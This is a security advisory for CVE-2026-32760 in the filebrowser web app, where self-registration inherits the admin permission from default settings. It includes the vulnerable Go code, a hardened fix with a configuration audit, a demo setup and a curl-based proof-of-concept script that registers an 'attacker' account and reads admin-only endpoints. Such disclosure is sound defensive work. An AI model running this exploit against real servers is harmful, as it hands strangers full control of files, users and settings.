CVE-2026-32760
Summary
Any unauthenticated visitor can register a full administrator account when self-registration (signup = true) is enabled and the default user permissions have perm.admin = true. The signup handler blindly applies all default settings - including Perm.Admin - to the new user without any server-side guard that strips admin from self-registered accounts.
Details
Affected file: http/auth.go
Vulnerable code:

```go
// signupHandler (http/auth.go)
user := &users.User{
    Username: info.Username,
}
d.settings.Defaults.Apply(user) // ← copies Perm.Admin = true if set in defaults
// NO guard: user.Perm.Admin is never cleared here
```

settings.UserDefaults.Apply (settings/defaults.go):

```go
func (d *UserDefaults) Apply(u *users.User) {
    u.Perm = d.Perm // copies full Permissions struct, including Admin field
    ...
}
```

Settings API permits Admin in defaults (http/settings.go):

```go
var settingsPutHandler = withAdmin(func(_ http.ResponseWriter, r *http.Request, d *data) (int, error) {
    ...
    d.settings.Defaults = req.Defaults // Admin can set Defaults.Perm.Admin = true
    ...
})
```

The signupHandler is supposed to create unprivileged accounts for new visitors. It contains no explicit user.Perm.Admin = false reset after Defaults.Apply. If an administrator (intentionally or accidentally) configures defaults.perm.admin = true and also enables signup, every account created via the public registration endpoint is an administrator with full control over all files, users, and server settings.
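The following is an added example, not code from the filebrowser project or from the advisory. It uses hypothetical stand-in types (Permissions, User, UserDefaults, Settings) that reproduce only the shape the advisory describes, and shows three things side by side: the vulnerable signup pattern that inherits Admin from defaults, a hardened variant that applies the same defaults and then clears Admin so that no defaults configuration can ever grant it to a self-registered account, and a small configuration audit that decodes a /api/settings document (field names taken from the JSON on this page) and flags the exact signup + defaults.perm.admin combination the advisory describes.

```go
package main

import (
	"encoding/json"
	"fmt"
)

// Hypothetical stand-ins for the filebrowser types the advisory names.
// They reproduce only the shape the advisory describes (Apply copies the
// whole Permissions struct); they are not the project's own code.
type Permissions struct {
	Admin    bool `json:"admin"`
	Execute  bool `json:"execute"`
	Create   bool `json:"create"`
	Rename   bool `json:"rename"`
	Modify   bool `json:"modify"`
	Delete   bool `json:"delete"`
	Share    bool `json:"share"`
	Download bool `json:"download"`
}

type User struct {
	Username string
	Perm     Permissions
}

type UserDefaults struct {
	Perm Permissions `json:"perm"`
}

// Apply mirrors settings.UserDefaults.Apply as quoted in the advisory: the
// full Permissions struct, Admin field included, is copied onto the user.
func (d *UserDefaults) Apply(u *User) {
	u.Perm = d.Perm
}

// NewSelfRegisteredUser is the vulnerable signupHandler pattern: defaults are
// applied and nothing clears Admin afterwards.
func NewSelfRegisteredUser(username string, d *UserDefaults) *User {
	u := &User{Username: username}
	d.Apply(u)
	return u
}

// NewSelfRegisteredUserHardened applies the same defaults and then forces
// Admin to false, so the defaults setting can never grant admin to a
// self-registered account no matter how the server is configured.
func NewSelfRegisteredUserHardened(username string, d *UserDefaults) *User {
	u := &User{Username: username}
	d.Apply(u)
	u.Perm.Admin = false // the server-side guard the vulnerable handler lacks
	return u
}

// Settings carries the two fields of a /api/settings document that matter
// for this issue (field names taken from the advisory's JSON).
type Settings struct {
	Signup   bool         `json:"signup"`
	Defaults UserDefaults `json:"defaults"`
}

// SignupGrantsAdmin is a configuration audit: it decodes a settings document
// and reports whether the dangerous combination (signup enabled and
// defaults.perm.admin true) is present.
func SignupGrantsAdmin(settingsJSON []byte) (bool, error) {
	var s Settings
	if err := json.Unmarshal(settingsJSON, &s); err != nil {
		return false, err
	}
	return s.Signup && s.Defaults.Perm.Admin, nil
}

func main() {
	defaults := &UserDefaults{Perm: Permissions{Admin: true, Create: true, Download: true}}
	v := NewSelfRegisteredUser("visitor", defaults)
	h := NewSelfRegisteredUserHardened("visitor", defaults)
	fmt.Printf("vulnerable handler: admin=%v, hardened handler: admin=%v\n", v.Perm.Admin, h.Perm.Admin)

	// Constructed sample of a settings document, shaped like the advisory's PUT body.
	sample := []byte(`{"signup":true,"defaults":{"perm":{"admin":true,"create":true}}}`)
	risky, err := SignupGrantsAdmin(sample)
	fmt.Println("signup grants admin:", risky, "err:", err)
}
```

The hardened constructor keeps every other default (create, download, and so on) intact; only Admin is pinned to false after Apply, which is the minimal guard the advisory says is missing. The audit function is meant to be run by an operator over the body returned by an authenticated GET of /api/settings, so the misconfiguration can be caught before signup is exposed.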
Demo Server Setup

```bash
# Pull latest release
docker run -d --name fb-test \
  -p 8080:80 \
  -v /tmp/fb-data:/srv \
  filebrowser/filebrowser:v2.31.2

# Wait for startup, then log in as the default admin to obtain a token
ADMIN_TOKEN=$(curl -s -X POST http://localhost:8080/api/login \
  -H 'Content-Type: application/json' \
  -d '{"username":"admin","password":"admin"}')

# Enable signup and set admin as default permission (defaults.perm.admin = true)
curl -s -X PUT http://localhost:8080/api/settings \
  -H "X-Auth: $ADMIN_TOKEN" \
  -H 'Content-Type: application/json' \
  -d '{
    "signup": true,
    "defaults": {
      "perm": {
        "admin": true,
        "execute": true,
        "create": true,
        "rename": true,
        "modify": true,
        "delete": true,
        "share": true,
        "download": true
      }
    }
  }'
```

PoC Exploit
```bash
#!/bin/bash
# poc_signup_admin.sh
# Demonstrates: unauthenticated signup → admin account
TARGET="http://localhost:8080"

echo "[*] Registering attacker account via public signup endpoint..."
STATUS=$(curl -s -o /dev/null -w "%{http_code}" \
  -X POST "$TARGET/api/signup" \
  -H "Content-Type: application/json" \
  -d '{"username":"attacker","password":"Attack3r!pass"}')
echo "[*] Signup response: HTTP $STATUS"

echo "[*] Logging in as newly created account..."
ATTACKER_TOKEN=$(curl -s -X POST "$TARGET/api/login" \
  -H "Content-Type: application/json" \
  -d '{"username":"attacker","password":"Attack3r!pass"}')

echo "[*] Fetching user list with attacker token (admin-only endpoint)..."
curl -s "$TARGET/api/users" \
  -H "X-Auth: $ATTACKER_TOKEN" | python3 -m json.tool
echo ""

echo "[*] Verifying admin access by reading /api/settings..."
curl -s "$TARGET/api/settings" \
  -H "X-Auth: $ATTACKER_TOKEN" | python3 -m json.tool
```

Expected output: The attacker's token successfully returns the full user list and server settings - endpoints restricted to Perm.Admin = true users.
Impact
Any unauthenticated visitor who can reach POST /api/signup obtains a full admin account.
From there, they can:
- List, read, modify, and delete every file on the server
- Create, modify, and delete all other users
- Change authentication method and server settings
- Execute arbitrary commands if enableExec = true
References
- https://github.com/filebrowser/filebrowser/security/advisories/GHSA-5gg9-5g7w-hm73
- https://github.com/filebrowser/filebrowser
